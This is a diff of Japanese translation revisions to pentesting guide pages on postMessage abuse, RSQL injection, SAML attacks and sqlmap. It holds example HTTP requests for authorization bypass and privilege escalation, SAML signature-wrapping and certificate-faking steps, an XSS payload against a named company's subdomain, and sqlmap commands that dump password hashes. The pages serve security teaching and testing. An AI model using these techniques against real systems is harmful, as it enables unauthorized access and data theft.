- **`escapeHtml`**関数は、文字をエスケープすることで入力をサニタイズすることを目的としています。しかし、新しいエスケープオブジェクトを作成するのではなく、既存のオブジェクトのプロパティを上書きします。この動作は悪用される可能性があります。特に、オブジェクトが操作されて、その制御されたプロパティが`hasOwnProperty`を認識しない場合、`escapeHtml`は期待通りに機能しません。以下の例で示されています:
- **`match()`**関数は、`search()`と同様に正規表現を処理します。正規表現が不適切に構成されている場合、バイパスされる可能性があります。
- **`escapeHtml`**関数は、文字をエスケープすることで入力をサニタイズすることを目的としています。しかし、新しいエスケープされたオブジェクトを作成するのではなく、既存のオブジェクトのプロパティを上書きします。この動作は悪用される可能性があります。特に、オブジェクトが操作されて、その制御されたプロパティが`hasOwnProperty`を認識しない場合、`escapeHtml`は期待通りに機能しません。以下の例で示されています:
- 期待される失敗:
@ -128,7 +126,7 @@ result.message // "'"<b>\"
%%%%%%を使用して**サンドボックス化されたiframe**内にウェブページを埋め込む場合、iframeのオリジンはnullに設定されることを理解することが重要です。これは、**サンドボックス属性**とそのセキュリティおよび機能への影響を扱う際に特に重要です。
サンドボックス属性**`allow-popups`**を指定すると、iframe内から開かれたポップアップウィンドウは親のサンドボックス制限を継承します。これは、**`allow-popups-to-escape-sandbox`**属性も含まれていない限り、ポップアップウィンドウのオリジンも同様に`null`に設定され、iframeのオリジンと一致することを意味します。
サンドボックス属性**`allow-popups`**を指定すると、iframe内から開かれたポップアップウィンドウは親のサンドボックス制限を継承します。これは、**`allow-popups-to-escape-sandbox`**属性も含まれていない限り、ポップアップウィンドウのオリジンも同様に`null`に設定され、iframeのオリジンと一致することを意味します。
したがって、これらの条件下でポップアップが開かれ、iframeからポップアップに**`postMessage`**を使用してメッセージが送信されると、送信側と受信側の両方のオリジンが`null`に設定されます。この状況は、**`e.origin == window.origin`**が真(`null == null`と評価されるシナリオを引き起こします。なぜなら、iframeとポップアップは同じオリジン値`null`を共有しているからです。
@ -158,7 +156,7 @@ bypassing-sop-with-iframes-2.md
### X-Frame-Header バイパス
これらの攻撃を実行するには、理想的には **被害者のウェブページ**`iframe` 内に配置できる必要があります。しかし、`X-Frame-Header` のようなヘッダーはその **動作****防ぐ** ことがあります。\
そのようなシナリオでは、あまりステルス性のない攻撃を使用することができます。脆弱なウェブアプリケーションに新しいタブを開き、通信することができます:
そのようなシナリオでは、あまりステルス性のない攻撃を使用することができます。脆弱なウェブアプリケーションに新しいタブを開き、それと通信することができます:
```html
<script>
var w=window.open("<url>")
@ -167,7 +165,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
```
### 子供に送信されたメッセージをメインページをブロックして盗む
次のページでは、データを送信する前に**メイン**ページを**ブロック**し、**子供**の**XSS**を悪用して**データを漏洩**させることで、**子供のiframe**に送信された**敏感なpostmessageデータ**をどのように盗むことができるかを示しています:
次のページでは、データを送信する前に**メイン**ページを**ブロック**し、**子供**の**XSS**を悪用して**データを漏洩**させることで、**敏感なpostmessageデータ**を**子供iframe**に送信する方法を示しています:
{{#ref}}
blocking-main-page-to-steal-postmessage.md
@ -175,7 +173,7 @@ blocking-main-page-to-steal-postmessage.md
### iframeの位置を変更してメッセージを盗む
X-Frame-Headerがないウェブページをiframeできる場合、別のiframeを含む場合、その**子供のiframeの位置を変更**することができます。もしそれが**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**オリジン**を自分が**制御**するページに**変更**し、メッセージを**盗む**ことができます:
X-Frame-Headerがないウェブページをiframeにでき、その中に別のiframeが含まれている場合、その**子供iframeの位置を変更**できます。もしそれが**ワイルドカード**を使用して送信された**postmessage**を受信している場合、攻撃者はそのiframeの**オリジン**を自分が**制御**するページに**変更**し、メッセージを**盗む**ことができます:
{{#ref}}
steal-postmessage-modifying-iframe-location.md
@ -185,9 +183,9 @@ steal-postmessage-modifying-iframe-location.md
`postMessage`を通じて送信されたデータがJSによって実行されるシナリオでは、**ページ**を**iframe**し、`postMessage`を介してエクスプロイトを送信することで**プロトタイプ汚染/XSS**を**悪用**できます。
[https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)に、**postMessage**を通じた**非常に良く説明されたXSS**のいくつかがあります。
**postMessageを通じた非常に良く説明されたXSS**のいくつかは、[https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)で見つけることができます。
`iframe`への`postMessage`を通じて**プロトタイプ汚染を悪用し、その後XSS**の例:
`iframe`への`postMessage`を通じて**プロトタイプ汚染とその後のXSS**を悪用するエクスプロイトの例:
```html
<html>
<body>

48
src/pentesting-web/rsql-injection.md
View File

@ -1,18 +1,14 @@
# RSQLインジェクション
## RSQLインジェクション
{{#include ../banners/hacktricks-training.md}}
## RSQLインジェクション
## RSQLとは何ですか
RSQLは、RESTful APIにおける入力のパラメータ化されたフィルタリングのために設計されたクエリ言語です。FIQLFeed Item Query Languageに基づいており、元々はMark NottinghamによってAtomフィードのクエリ用に指定されました。RSQLは、そのシンプルさと、HTTP上でコンパクトかつURI準拠の方法で複雑なクエリを表現できる能力で際立っています。これにより、RESTエンドポイント検索の一般的なクエリ言語として優れた選択肢となります。
## RSQLとは
RSQLは、RESTful APIにおける入力のパラメータ化されたフィルタリングのために設計されたクエリ言語です。FIQLFeed Item Query Languageに基づいており、元々Mark NottinghamによってAtomフィードのクエリ用に指定されました。RSQLは、そのシンプルさと、HTTP上でコンパクトかつURI準拠の方法で複雑なクエリを表現できる能力で際立っています。これにより、RESTエンドポイント検索の一般的なクエリ言語として優れた選択肢となります。
## 概要
RSQLインジェクションは、RESTful APIでRSQLをクエリ言語として使用するウェブアプリケーションにおける脆弱性です。[SQLインジェクション](https://owasp.org/www-community/attacks/SQL_Injection)や[LDAPインジェクション](https://owasp.org/www-community/attacks/LDAP_Injection)と同様に、この脆弱性はRSQLフィルタが適切にサニタイズされていない場合に発生し、攻撃者が悪意のあるクエリを注入して、データに対するアクセス、変更、または削除を無許可で行うことを可能にします。
## どのように機能しますか?
## どのように機能するのか?
RSQLは、RESTful APIで高度なクエリを構築することを可能にします。例えば
```bash
/products?filter=price>100;category==electronics
@ -47,8 +43,8 @@ Or even take advantage to extract sensitive information with Boolean queries or
| `<` & `=lt=` | **未満**クエリを実行。*columnA*の値が*queryValue*より小さい*myTable*のすべての行を返す | `/api/v2/myTable?q=columnA<queryValue` <br> `/api/v2/myTable?q=columnA=lt=queryValue` |
| `=le=` & `<=` | **未満**または**等しい**クエリを実行。*columnA*の値が*queryValue*以下の*myTable*のすべての行を返す | `/api/v2/myTable?q=columnA<=queryValue` <br> `/api/v2/myTable?q=columnA=le=queryValue` |
| `>` & `=gt=` | **より大きい**クエリを実行。*columnA*の値が*queryValue*より大きい*myTable*のすべての行を返す | `/api/v2/myTable?q=columnA>queryValue` <br> `/api/v2/myTable?q=columnA=gt=queryValue` |
| `>=` & `=ge=` | **等しい**または**より大きい**クエリを実行。*columnA*の値が*queryValue*と等しいかそれ以上の*myTable*のすべての行を返す | `/api/v2/myTable?q=columnA>=queryValue` <br> `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | **範囲**クエリを実行。*columnA*の値が*fromValue*以上、*toValue*以下の*myTable*のすべての行を返す | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
| `>=` & `=ge=` | **等しい**または**より大きい**クエリを実行。*columnA*の値が*queryValue*以上の*myTable*のすべての行を返す | `/api/v2/myTable?q=columnA>=queryValue` <br> `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | **範囲**クエリを実行。*columnA*の値が*fromValue*以上、かつ*toValue*以下の*myTable*のすべての行を返す | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
**注意**: テーブルは[**MOLGENIS**](https://molgenis.gitbooks.io/molgenis/content/)および[**rsql-parser**](https://github.com/jirutka/rsql-parser)アプリケーションの情報に基づいています。
@ -70,15 +66,15 @@ Or even take advantage to extract sensitive information with Boolean queries or
| フィルター | 説明 | 例 |
|--------|------------|---------|
| `filter[users]` | 特定のユーザーによる結果をフィルタリング | `/api/v2/myTable?filter[users]=123` |
| `filter[status]` | ステータス(アクティブ/非アクティブ、完了など)によるフィルタリング | `/api/v2/orders?filter[status]=active` |
| `filter[status]` | ステータス(アクティブ/非アクティブ、完了など)フィルタリング | `/api/v2/orders?filter[status]=active` |
| `filter[date]` | 日付範囲内の結果をフィルタリング | `/api/v2/logs?filter[date]=gte:2024-01-01` |
| `filter[category]` | カテゴリまたはリソースタイプによるフィルタリング | `/api/v2/products?filter[category]=electronics` |
| `filter[id]` | 一意の識別子によるフィルタリング | `/api/v2/posts?filter[id]=42` |
| `filter[category]` | カテゴリまたはリソースタイプフィルタリング | `/api/v2/products?filter[category]=electronics` |
| `filter[id]` | 一意の識別子フィルタリング | `/api/v2/posts?filter[id]=42` |
## 一般的なパラメータ
これらのパラメータはAPIの応答を最適化するのに役立ちます
## 一般的なパラメータ
これらのパラメータはAPIの応答を最適化するのに役立ちます
| パラメータ | 説明 | 例 |
| パラメータ | 説明 | 例 |
|-----------|------------|---------|
| `include` | 応答に関連リソースを含める | `/api/v2/orders?include=customer,items` |
| `sort` | 結果を昇順または降順にソート | `/api/v2/users?sort=-created_at` |
@ -88,7 +84,7 @@ Or even take advantage to extract sensitive information with Boolean queries or
| `search` | より柔軟な検索を実行 | `/api/v2/posts?search=technology` |
## 情報漏洩とユーザーの列挙
以下のリクエストは、メールパラメータを必要とする登録エンドポイントを示しており、そのメールで登録されているユーザーがいるかどうかを確認し、データベースに存在するかどうかに応じて真または偽を返します:
以下のリクエストは、メールパラメータを必要とする登録エンドポイントを示しており、そのメールで登録されているユーザーがいるかどうかを確認し、データベースに存在するかどうかに応じて真または偽を返します:
### リクエスト
```
GET /api/registrations HTTP/1.1
@ -125,7 +121,7 @@ Content-Length: 85
}]
}
```
`/api/registrations?email=<emailAccount>` が期待されるが、特別な演算子を使用してRSQLフィルターを利用し、ユーザー情報を列挙および/または抽出しようとすることが可能である。
`/api/registrations?email=<emailAccount>`が期待されるが、特別な演算子を使用してRSQLフィルターを利用し、ユーザー情報を列挙および/または抽出しようとすることが可能である。
### Request
```
GET /api/registrations?filter[userAccounts]=email=='test@test.com' HTTP/1.1
@ -209,7 +205,7 @@ Access-Control-Allow-Origin: *
}
```
## 認可回避
このシナリオでは、基本的な役割を持つユーザーから始まり、データベースに登録されているすべてのユーザーのリストにアクセスするための特権的な権限(例:管理者)がない状態です
このシナリオでは、基本的な役割を持つユーザーから始まり、データベースに登録されているすべてのユーザーのリストにアクセスするための特権的な権限(例:管理者)がない状態です
### リクエスト
```
GET /api/users HTTP/1.1
@ -227,7 +223,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### レスポンス
### 応答
```
HTTP/1.1 403
Date: Sat, 22 Mar 2025 14:40:07 GMT
@ -314,7 +310,7 @@ Access-Control-Allow-Origin: *
................
```
## 権限昇格
ユーザーの役割を通じてユーザー権限を確認する特定のエンドポイントを見つける可能性が非常に高いです。例えば、権限を持たないユーザーを扱っています:
ユーザーの役割を通じてユーザー権限をチェックする特定のエンドポイントを見つけることは非常に可能性が高いです。例えば、権限を持たないユーザーを扱っています:
### リクエスト
```
GET /api/companyUsers?include=role HTTP/1.1
@ -332,7 +328,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### レスポンス
### 応答
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:08 GMT
@ -366,7 +362,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### 反応
### レスポンス
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:45 GMT
@ -396,7 +392,7 @@ Access-Control-Allow-Origin: *
}]
}
```
管理者ユーザーの識別子を知った後、対応するフィルターを管理者の識別子に置き換えたり追加したりすることで、特権昇格を悪用し、同じ特権を得ることが可能になります:
管理者ユーザーの識別子を知った後、対応するフィルターを管理者の識別子に置き換えたり追加したりすることで、特権昇格を悪用することが可能になります。そして、同じ特権を得ることができます:
### Request
```
GET /api/functionalities/allPermissionsFunctionalities?filter[companyUsers]=user.id=='94****************************' HTTP/1.1
@ -414,7 +410,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### レスポンス
### 反応
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 18:53:00 GMT
@ -459,7 +455,7 @@ Access-Control-Allow-Origin: *
}, {
.......
```
## なりすましまたは不な直接オブジェクト参照 (IDOR)
## なりすましまたは不適切な直接オブジェクト参照 (IDOR)
`filter` パラメータの使用に加えて、結果に特定のパラメータ(例:言語、国、パスワードなど)を含めることを可能にする `include` のような他のパラメータを使用することもできます。
次の例では、私たちのユーザープロファイルの情報が表示されます:
@ -534,7 +530,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### 反応
### レスポンス
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:50:07 GMT

66
src/pentesting-web/saml-attacks/README.md
View File

@ -1,7 +1,5 @@
# SAML Attacks
## SAML Attacks
{{#include ../../banners/hacktricks-training.md}}
## 基本情報
@ -16,7 +14,7 @@ saml-basics.md
## XMLラウンドトリップ
XMLでは、XMLの署名された部分がメモリに保存され、その後エンコーディング/デコーディングが行われ、署名がチェックされます。理想的には、そのエンコーディング/デコーディングはデータを変更しないはずですが、そのシナリオに基づくと、**チェックされているデータと元のデータは同じでない可能性があります**。
XMLでは、XMLの署名された部分がメモリに保存され、その後いくつかのエンコーディング/デコーディングが行われ、署名がチェックされます。理想的には、そのエンコーディング/デコーディングはデータを変更しないはずですが、そのシナリオに基づくと、**チェックされるデータと元のデータは同じでない可能性があります**。
例えば、次のコードを確認してください:
```ruby
@ -42,7 +40,7 @@ First child after round-trip: Z
![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../images/image (1001).png>)
そして、これは解析とシリアル化の一巡後にどのように見えたかです:
そして、これは解析とシリアル化の一巡後にどのように見えたかです:
![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../images/image (445).png>)
@ -53,69 +51,69 @@ First child after round-trip: Z
## XML署名ラッピング攻撃
**XML署名ラッピング攻撃XSW**では、敵対者はXMLドキュメントが**署名検証**と**関数呼び出し**の2つの異なるフェーズを通過する際に発生する脆弱性を悪用します。これらの攻撃はXMLドキュメントの構造を変更することを含みます。具体的には、攻撃者はXML署名の有効性を損なうことなく**偽造要素を注入**します。この操作は、**アプリケーションロジック**によって分析される要素と、**署名検証モジュール**によってチェックされる要素との間に不一致を生じさせることを目的としています。その結果、XML署名は技術的には有効であり、検証を通過しますが、アプリケーションロジックは**不正な要素**を処理します。したがって、攻撃者はXML署名の**整合性保護**と**起源認証**を効果的に回避し、検出されることなく**任意のコンテンツを注入**することができます。
**XML署名ラッピング攻撃XSW**では、敵対者はXMLドキュメントが2つの異なるフェーズ、すなわち**署名検証**と**関数呼び出し**を通じて処理される際に発生する脆弱性を悪用します。これらの攻撃はXMLドキュメントの構造を変更することを含みます。具体的には、攻撃者はXML署名の有効性を損なわない**偽造要素**を**注入**します。この操作は、**アプリケーションロジック**によって分析される要素と、**署名検証モジュール**によってチェックされる要素との間に不一致を生じさせることを目的としています。その結果、XML署名は技術的には有効であり、検証を通過しますが、アプリケーションロジックは**不正な要素**を処理します。したがって、攻撃者はXML署名の**整合性保護**と**起源認証**を効果的に回避し、検出されることなく**任意のコンテンツを注入**することができます。
以下の攻撃は[**このブログ記事**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **および** [**この論文**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)に基づいています。詳細についてはそれらを確認してください。
### XSW #1
- **戦略**署名を含む新しいルート要素が追加されます。
- **影響**検証者は正当な「Response -> Assertion -> Subject」と攻撃者の「悪意のある新しいResponse -> Assertion -> Subject」を混同する可能性があり、データ整合性の問題を引き起こします。
- **戦略**: 署名を含む新しいルート要素が追加されます。
- **影響**: 検証者は正当な「Response -> Assertion -> Subject」と攻撃者の「悪意のある新しいResponse -> Assertion -> Subject」を混同する可能性があり、データ整合性の問題を引き起こします。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-1.svg](<../../images/image (506).png>)
### XSW #2
- **XSW #1との違い**:包み署名の代わりに切り離された署名を利用します。
- **影響**「悪意のある」構造は、XSW #1と同様に、整合性チェック後のビジネスロジックを欺くことを目的としています。
- **XSW #1との違い**: 包含署名の代わりに切り離された署名を利用します。
- **影響**: XSW #1と同様の「悪意のある」構造は、整合性チェック後にビジネスロジックを欺くことを目的としています。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../images/image (466).png>)
### XSW #3
- **戦略**元のアサーションと同じ階層レベルで悪意のあるアサーションが作成されます。
- **影響**ビジネスロジックを混乱させて悪意のあるデータを使用させることを意図しています。
- **戦略**: 元のアサーションと同じ階層レベルで悪意のあるアサーションが作成されます。
- **影響**: ビジネスロジックを混乱させて悪意のあるデータを使用させることを意図しています。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../images/image (120).png>)
### XSW #4
- **XSW #3との違い**元のアサーションが複製された(悪意のある)アサーションの子になります。
- **影響**XSW #3と似ていますが、XML構造をより攻撃的に変更します。
- **XSW #3との違い**: 元のアサーションが複製された(悪意のある)アサーションの子要素になります。
- **影響**: XSW #3と似ていますが、XML構造をより攻撃的に変更します。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-4.svg](<../../images/image (551).png>)
### XSW #5
- **ユニークな側面**:署名も元のアサーションも標準的な構成(包み/包まれる/切り離された)に従っていません。
- **影響**コピーされたアサーションが署名を包み、期待されるドキュメント構造を変更します。
- **ユニークな側面**: 署名も元のアサーションも標準的な構成(包含/包含する/切り離された)に従っていません。
- **影響**: コピーされたアサーションが署名を包み込み、期待されるドキュメント構造を変更します。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-5.svg](<../../images/image (1030).png>)
### XSW #6
- **戦略**XSW #4および#5と同様の位置挿入ですが、ひねりがあります。
- **影響**コピーされたアサーションが署名を包み、その後元のアサーションを包むことで、入れ子の欺瞞的な構造を作成します。
- **戦略**: XSW #4および#5と同様の位置挿入ですが、ひねりがあります。
- **影響**: コピーされたアサーションが署名を包み込み、その後元のアサーションを包み込むことで、入れ子の欺瞞的な構造を作成します。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-6.svg](<../../images/image (169).png>)
### XSW #7
- **戦略**:コピーされたアサーションを子として持つ拡張要素が挿入されます。
- **影響**:これは、OpenSAMLのようなライブラリでスキーマ検証対策を回避するために、拡張要素の制約の少ないスキーマを悪用します。
- **戦略**: コピーされたアサーションを子要素として持つExtensions要素が挿入されます。
- **影響**: これはExtensions要素の制約の少ないスキーマを利用して、特にOpenSAMLのようなライブラリでスキーマ検証対策を回避します。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../images/image (971).png>)
### XSW #8
- **XSW #7との違い**攻撃のバリエーションのために別の制約の少ないXML要素を利用します。
- **影響**元のアサーションが制約の少ない要素の子になり、XSW #7で使用された構造を逆転させます
- **XSW #7との違い**: 攻撃のバリエーションのために別の制約の少ないXML要素を利用します。
- **影響**: 元のアサーションが制約の少ない要素の子要素になり、XSW #7で使用された構造を逆転させます
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../images/image (541).png>)
### ツール
Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用してリクエストを解析し、選択したXSW攻撃を適用し実行できます。
Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用してリクエストを解析し、選択したXSW攻撃を適用し実行できます。
## XXE
@ -147,7 +145,7 @@ SAMLレスポンスは**デフレートされ、base64エンコードされたXM
Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用して、SAMLリクエストからPOCを生成し、XXE脆弱性やSAML脆弱性の可能性をテストできます。
このトークもチェックしてください: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
また、このトークもチェックしてください: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
## SAML経由のXSLT
@ -157,7 +155,7 @@ XSLTに関する詳細情報は、以下にアクセスしてください:
../xslt-server-side-injection-extensible-stylesheet-language-transformations.md
{{#endref}}
拡張スタイルシート言語変換XSLTは、XMLドキュメントをHTML、JSON、PDFなどのさまざまな形式に変換するために使用できます。**XSLT変換はデジタル署名の検証前に行われる**ことに注意することが重要です。これは、攻撃が有効な署名なしでも成功する可能性があることを意味します。自己署名または無効な署名で進行するのに十分です。
拡張スタイルシート言語変換XSLTは、XMLドキュメントをHTML、JSON、PDFなどのさまざまな形式に変換するために使用できます。**XSLT変換はデジタル署名の検証前に行われる**ことに注意することが重要です。これは、攻撃が有効な署名なしでも成功する可能性があることを意味します。自己署名または無効な署名で進むことができます。
ここでは、この種の脆弱性をチェックするための**POC**を見つけることができ、セクションの最初に言及されたhacktricksページでペイロードを見つけることができます。
```xml
@ -187,43 +185,43 @@ Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb1
## XML署名除外 <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
**XML署名除外**は、Signature要素が存在しない場合のSAML実装の動作を観察します。この要素が欠けている場合、**署名の検証が行われない可能性があり**、脆弱性を持つことになります。署名によって通常検証される内容を変更することで、これをテストすることが可能です。
**XML署名除外**は、署名要素が存在しない場合のSAML実装の動作を観察します。この要素が欠けている場合、**署名の検証が行われない可能性があり**、脆弱性を持つことになります。署名によって通常検証される内容を変更することで、これをテストすることが可能です。
![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../images/image (457).png>)
### ツール <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用することもできます。SAMLレスポンスを傍受し、`Remove Signatures`をクリックします。これにより、**すべての**Signature要素が削除されます。
Burp拡張機能[**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)を使用できます。SAMLレスポンスをインターセプトし、`Remove Signatures`をクリックします。これにより、**すべての**署名要素が削除されます。
署名が削除された状態で、リクエストをターゲットに進めます。Signatureがサービスによって必要とされていない場合
署名が削除された状態で、リクエストをターゲットに進めます。サービスによって署名が必要ない場合
## 証明書の偽造 <a href="#certificate-faking" id="certificate-faking"></a>
## 証明書の偽造
証明書の偽造は、**サービスプロバイダーSPがSAMLメッセージが信頼されたアイデンティティプロバイダーIdPによって署名されていることを適切に検証しているかどうかをテストする技術**です。これは、SAMLレスポンスまたはアサーションに\***自己署名証明書**を使用して署名することを含み、SPとIdP間の信頼検証プロセスを評価するのに役立ちます。
証明書の偽造は、**サービスプロバイダーSPがSAMLメッセージが信頼できるアイデンティティプロバイダーIdPによって署名されていることを適切に検証しているかどうかをテストする技術**です。これは、SAMLレスポンスまたはアサーションに署名するために\***自己署名証明書**を使用することを含み、SPとIdP間の信頼検証プロセスを評価するのに役立ちます。
### 証明書の偽造を実施する方法
以下の手順は、[SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp拡張機能を使用したプロセスを概説しています
1. SAMLレスポンスを傍受します。
1. SAMLレスポンスをインターセプトします。
2. レスポンスに署名が含まれている場合、`Send Certificate to SAML Raider Certs`ボタンを使用して証明書をSAML Raider Certsに送信します。
3. SAML Raiderの証明書タブで、インポートした証明書を選択し、`Save and Self-Sign`をクリックして元の証明書の自己署名クローンを作成します。
4. Burpのプロキシで傍受したリクエストに戻ります。XML署名のドロップダウンから新しい自己署名証明書を選択します。
4. Burpのプロキシでインターセプトしたリクエストに戻ります。XML署名のドロップダウンから新しい自己署名証明書を選択します。
5. `Remove Signatures`ボタンを使用して既存の署名を削除します。
6. 適切に**`(Re-)Sign Message`**または**`(Re-)Sign Assertion`**ボタンを使用して、新しい証明書でメッセージまたはアサーションに署名します。
7. 署名されたメッセージを転送します。成功した認証は、SPが自己署名証明書で署名されたメッセージを受け入れることを示し、SAMLメッセージの検証プロセスに潜在的な脆弱性があることを明らかにします。
## トークン受信者の混乱 / サービスプロバイダーターゲットの混乱 <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
トークン受信者の混乱とサービスプロバイダーターゲットの混乱は、**サービスプロバイダーがレスポンスの意図された受信者を正しく検証しているかどうかを確認すること**を含みます。基本的に、サービスプロバイダーは、異なるプロバイダー向け認証レスポンスを拒否する必要があります。ここでの重要な要素は、SAMLレスポンスの**SubjectConfirmationData**要素内にある**Recipient**フィールドです。このフィールドは、アサーションが送信されるべきURLを指定します。実際の受信者が意図されたサービスプロバイダーと一致しない場合、アサーションは無効と見なされるべきです。
トークン受信者の混乱とサービスプロバイダーターゲットの混乱は、**サービスプロバイダーがレスポンスの意図された受信者を正しく検証しているかどうかを確認すること**を含みます。基本的に、サービスプロバイダーは、異なるプロバイダー向けに意図された認証レスポンスを拒否する必要があります。ここでの重要な要素は、SAMLレスポンスの**SubjectConfirmationData**要素内にある**Recipient**フィールドです。このフィールドは、アサーションが送信されるべきURLを指定します。実際の受信者が意図されたサービスプロバイダーと一致しない場合、アサーションは無効と見なされるべきです。
#### **動作の仕組み**
SAMLトークン受信者の混乱SAML-TRC攻撃が実行可能であるためには、特定の条件が満たされる必要があります。まず、サービスプロバイダーSP-Legitに有効なアカウントが存在する必要があります。次に、ターゲットとするサービスプロバイダーSP-Targetは、SP-Legitにサービスを提供するのと同じアイデンティティプロバイダーからのトークンを受け入れる必要があります。
これらの条件下で攻撃プロセスは簡単です。共有アイデンティティプロバイダーを介してSP-Legitとの間で認証セッションが開始されます。アイデンティティプロバイダーからSP-LegitへのSAMLレスポンスが傍受されます。この傍受されたSAMLレスポンスは、元々SP-Legit向けであったものがSP-Targetにリダイレクトされます。この攻撃の成功は、SP-Targetがアサーションを受け入れ、SP-Legitで使用されたのと同じアカウント名のリソースへのアクセスを許可することによって測定されます。
これらの条件下で攻撃プロセスは簡単です。共有アイデンティティプロバイダーを介してSP-Legitとの間で認証セッションが開始されます。アイデンティティプロバイダーからSP-LegitへのSAMLレスポンスがインターセプトされます。このインターセプトされたSAMLレスポンスは、元々SP-Legit向けであったものがSP-Targetにリダイレクトされます。この攻撃の成功は、SP-Targetがアサーションを受け入れ、SP-Legitで使用されたのと同じアカウント名のリソースへのアクセスを許可することによって測定されます。
```python
# Example to simulate interception and redirection of SAML Response
def intercept_and_redirect_saml_response(saml_response, sp_target_url):
@ -256,11 +254,11 @@ https://carbon-prototype.uberinternal.com:443/oidauth/logout
```
https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
```
これは、`base`パラメータがURLを受け入れることを明らかにしました。これを考慮して、XSSクロスサイトスクリプティング攻撃を開始する試みとして、URLを`javascript:alert(123);`に置き換えるアイデアが浮かびました。
これにより、`base`パラメータがURLを受け入れることが明らかになりました。これを考慮して、XSSクロスサイトスクリプティング攻撃を開始する試みとして、URLを`javascript:alert(123);`に置き換えるアイデアが浮かびました。
### 大規模な悪用
[この研究から](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/):
[この研究から](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)
[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor)ツールを使用して、同じライブラリを利用している`uberinternal.com`のサブドメインを分析しました。その後、`oidauth/prompt`ページをターゲットにしたスクリプトが開発されました。このスクリプトは、データを入力して出力に反映されるかどうかを確認することでXSSクロスサイトスクリプティングをテストします。入力が実際に反映される場合、スクリプトはそのページを脆弱であるとフラグ付けします。
```python

72
src/pentesting-web/sql-injection/sqlmap.md
View File

@ -1,8 +1,10 @@
# SQLMap
{{#include ../../banners/hacktricks-training.md}}
# SQLmapの基本引数
## SQLmapの基本引数
## 一般的な
### 一般的な
```bash
-u "<URL>"
-p "<PARAM TO TEST>"
@ -19,9 +21,9 @@
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
```
## 情報の取得
### 情報の取得
### 内部
#### 内部
```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
@ -29,7 +31,7 @@
--users #Get usernames od DB
--passwords #Get passwords of users in DB
```
### DBデータ
#### DBデータ
```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
@ -38,24 +40,24 @@
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```
# インジェクションポイント
## インジェクションポイント
## Burp/ZAPキャプチャから
### Burp/ZAPキャプチャから
リクエストをキャプチャし、req.txtファイルを作成します。
```bash
sqlmap -r req.txt --current-user
```
## GETリクエストインジェクション
### GETリクエストインジェクション
```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```
## POSTリクエストインジェクション
### POSTリクエストインジェクション
```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```
